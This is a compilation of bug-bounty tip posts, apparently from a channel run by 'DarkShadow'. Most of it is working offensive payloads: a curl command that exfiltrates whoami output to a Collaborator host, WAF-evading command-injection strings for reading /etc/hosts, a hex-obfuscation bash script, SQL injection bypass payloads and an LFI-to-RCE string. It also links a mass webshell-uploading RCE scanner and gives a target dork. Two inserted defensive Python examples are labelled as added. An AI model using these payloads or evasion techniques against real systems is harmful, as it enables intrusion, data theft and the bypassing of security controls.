Hey Hunter’s,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Other formats you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK
Sometimes targets might be vulnerable but not give you the output, so never forget to try your Burp Collaborator to get the output.
NOTICE: always check the User-Agent header in your Burp Collaborator response; if you got curl there, it means RCE.
Now you hit follow me for more: x.com/darkshadow2bd
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but the WAF blocks it every time?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know, guys, whether you all want more like that or not.
Brut Security
This is for copycats who copy my posts and share without credit:
~DarkShadow
Hey copycats, stop copying my posts and do it yourself. If you don't think deeply then first learn deeply.
~DarkShadow
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Check out this job at National Cyber Security Services: https://www.linkedin.com/jobs/view/4340448773
National Cyber Security Services hiring Security monitoring & incident response in Kolkata, West Bengal, India | LinkedIn
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
  char="${str:i:1}"
  ascii=$(printf '%d' "'$char")
  hex=$(printf '%02x' "$ascii")
  out="${out}\\x${hex}"
done
echo "$'$out'"
Guys, using this dark-hex script of mine you can directly execute obfuscated commands in bash!
#bugbountytips #bypass
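A defender-side view of the two bypass posts above (the `tac` variants and the `$'\x..'` form), added here as an example and not taken from the channel: a filter that compares raw input against strings misses all of them, so this sketch first undoes the shell-level rewrites and only then matches arguments against a watchlist. `SENSITIVE_PATHS`, `canonicalize`, `expand_braces` and `sensitive_hits` are hypothetical names, and the watchlist is an assumption.

```python
import fnmatch
import re

# Assumed watchlist for this example; a real rule set would be larger.
SENSITIVE_PATHS = ["/etc/hosts", "/etc/passwd", "/etc/shadow"]

_ANSI_C = re.compile(r"\$'((?:\\x[0-9a-fA-F]{2}|[^'\\])*)'")
_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
_BRACES = re.compile(r"\{([^{}]*,[^{}]*)\}")


def canonicalize(raw: str) -> str:
    """Undo the shell-level rewrites shown in the posts before matching."""
    # $'\x77\x68...' -> the literal characters bash would produce
    s = _ANSI_C.sub(
        lambda m: _HEX.sub(lambda h: chr(int(h.group(1), 16)), m.group(1)), raw)
    s = re.sub(r"\$\{IFS\}|\$IFS", " ", s)  # ${IFS} acts as a separator
    s = re.sub(r"\\(.)", r"\1", s)           # \t outside quotes is just t
    return s


def expand_braces(word: str) -> list[str]:
    """Expand {a,b} alternatives the way bash does before globbing."""
    m = _BRACES.search(word)
    if not m:
        return [word]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(word[:m.start()] + alt + word[m.end():]))
    return out


def sensitive_hits(raw: str) -> set[str]:
    """Return the watched paths that any argument could resolve to."""
    hits = set()
    for word in canonicalize(raw).split():
        for pattern in expand_braces(word):
            # fnmatch lets * cross '/', so this over-matches slightly,
            # which is the safe direction for a detection rule.
            hits.update(p for p in SENSITIVE_PATHS
                        if fnmatch.fnmatchcase(p, pattern))
    return hits


if __name__ == "__main__":
    # Inputs are the strings from the posts above.
    for sample in (r"tac /e\t\c/h\o\s\t\s", r"tac /??c/??sts"):
        print(sample, "->", sorted(sensitive_hits(sample)))
```

Matching on the canonical form narrows the gap, but the durable fix for the injection itself is to stop passing request data to a shell at all.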
⚡️Outdated but helpful: some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogic
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
Hey Hunter’s,
DarkShadow is here back again!
Before Testing Complex RCE Payloads, Sometimes You Need to Think Simple.
👇🏻Like:
parameter=value id
Now Guys simply show your love ❤️
#bugbountytips #rce
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
Hey Hunter's,
DarkShadow here back again!
✅CRLF injection Explain🔥
This vulnerability allows an attacker to add their custom header on the response, if you can inject \r\n.
☠️Impact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: headers]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Response manipulation [\r\n\r\n<h1>Hacked</h1>]
Now guys, show your love ❤️
#bugbountytips #crlf
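The header injection described in the post, seen from the server side, added here as an example and not taken from the channel: a redirect builder that concatenates a request value into `Location`, next to one that rejects control characters before the value reaches the header block. The function names and the sample value are constructed for illustration.

```python
import re

# Constructed sample: a redirect target taken from a request parameter.
# It carries CR LF followed by a Set-Cookie header, the session-fixation
# case listed in the post.
SAMPLE_NEXT = "/home\r\nSet-Cookie: session=attacker-chosen"

_CTL = re.compile(r"[\x00-\x1f\x7f]")  # CR, LF, NUL and other control bytes


def build_redirect_naive(target: str) -> bytes:
    """'Before': the value is concatenated into the header block as-is."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {target}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def build_redirect_checked(target: str) -> bytes:
    """'After': refuse any header value containing control characters."""
    if _CTL.search(target):
        raise ValueError("control character in header value")
    return build_redirect_naive(target)


def header_names(raw: bytes) -> list[str]:
    """Parse the header block the way a client would and list field names."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


if __name__ == "__main__":
    # The naive builder emits a header the application never set.
    print(header_names(build_redirect_naive(SAMPLE_NEXT)))
    try:
        build_redirect_checked(SAMPLE_NEXT)
    except ValueError as exc:
        print("rejected:", exc)
```

The check has to run on the decoded value, after the framework has turned any percent-encoding into raw bytes.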
ATO/RCE
👇Dork
HUNTER : product.name="open-webui"
Hey,
if you feel anything here could be improved, drop your suggestion please :)
Hey Hunter's,
DarkShadow here back again!
If you ever get an LFI vector parameter, then don't just try LFI payloads.
Parameter: &Path= ❎LFI ✅RCE
Payload for RCE: "|id||"
#bugbountytips #rce
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
🔗 https://github.com/kevin-mizu/domloggerpp